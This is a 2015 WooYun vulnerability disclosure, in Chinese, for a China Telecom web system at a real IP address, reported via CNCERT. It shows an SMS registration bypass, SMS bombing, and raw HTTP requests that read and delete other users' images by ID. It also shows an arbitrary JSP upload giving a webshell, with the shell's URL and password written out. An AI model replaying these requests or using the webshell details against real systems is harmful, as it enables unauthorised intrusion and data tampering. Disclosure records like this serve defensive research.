当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116407

漏洞标题:中国电信某重要系统漏洞打包

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-05-27 09:59

修复时间:2015-07-14 23:08

公开时间:2015-07-14 23:08

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-05-30: 厂商已经确认,细节仅向厂商公开
2015-06-09: 细节向核心白帽子及相关领域专家公开
2015-06-19: 细节向普通白帽子公开
2015-06-29: 细节向实习白帽子公开
2015-07-14: 细节向公众公开

简要描述:

任意文件上传

详细说明:

中国电信微号
地址:http://124.126.119.144/

QQ截图20150526225458.jpg


该系统运行允许使用电信短信密码以及中国电信通行证进行登录,可见其厉害之处

QQ截图20150526225736.jpg


这里我要用我大移动手机进行注册,但是系统提示仅允许电信号注册,切

QQ截图20150526225717.jpg


看我如何绕过限制

QQ截图20150526225959.jpg


QQ截图20150526230228.jpg


没错,就是这里,忘记密码处没有对移动手机号码进行判断,导致大移动成功收到验证短信,且短信可用于用户注册。

QQ图片20150526230418.png


此处存在短信任意发送漏洞,可指定任意手机号进行短信轰炸

QQ图片20150526231505.png


QQ截图20150526231703.jpg

漏洞证明:

通过获取到的注册码进行用户注册

QQ截图20150526231833.jpg


在注册的时候可以选择个人或者企业,我选择了企业

QQ截图20150526232033.jpg


就这样我用138段的移动号码成功注册了一个所谓的微号

QQ截图20150526230914.jpg


居然还有免费的短信限额

QQ截图20150526232320.jpg


在素材菜单里,存在越权操作他人素材的漏洞
在素材预览时,抓包,可以获取到素材id,该id按一定规则递增,可通过遍历得到他人素材路径

QQ截图20150526232849.jpg


比如POST 

http://124.126.119.144/pnumber/picMgrJson/picMgr_getPicInfo.do HTTP/1.1
Host: 124.126.119.144
Connection: keep-alive
Content-Length: 15
Accept: */*
Origin: http://124.126.119.144
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://124.126.119.144/pnumber/picMgr/picMgr_goPicMgrPage.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=36AB22546EE245018383C40AD2D6E175
form.pic.id=580


{"pic":{"id":580,"picUrl":"http:\/\/weihao.b0.upaiyun.com\/picMgr\/2015\/05\/08\/e97a5ceed84a4aebb75030201f7056e9.jpg","picName":"e97a5ceed84a4aebb75030201f7056e9.jpg"},"isSuccess":true}


QQ截图20150526233306.jpg


http://weihao.b0.upaiyun.com/picMgr/2015/05/08/e97a5ceed84a4aebb75030201f7056e9.jpg


删除它

POST http://124.126.119.144/pnumber/picMgrJson/picMgr_deletePic.do HTTP/1.1
Host: 124.126.119.144
Connection: keep-alive
Content-Length: 15
Accept: */*
Origin: http://124.126.119.144
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://124.126.119.144/pnumber/picMgr/picMgr_goPicMgrPage.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=36AB22546EE245018383C40AD2D6E175
form.pic.id=580


QQ截图20150526235419.jpg


以上其实都是小问题,直接看上传吧,我该准备睡觉了
在“我的”中,有个我的微店

QQ截图20150526235914.jpg


新建微店处,存在图片上传(店铺图标)

QQ截图20150527000022.jpg


该处可直接上传jsp文件,并返回文件路径

QQ截图20150527000224.jpg


http://124.126.119.144/jsp/shop/upload/temp/150527000028809.jsp

QQ截图20150527000307.jpg


一句话地址:http://124.126.119.144/jsp/shop/upload/temp/150526222648894.jsp
密码:023

QQ截图20150526230833.jpg


QQ截图20150526230810.jpg


QQ截图20150527000501.jpg


数据库我就不看了

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-30 23:07

厂商回复:

已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无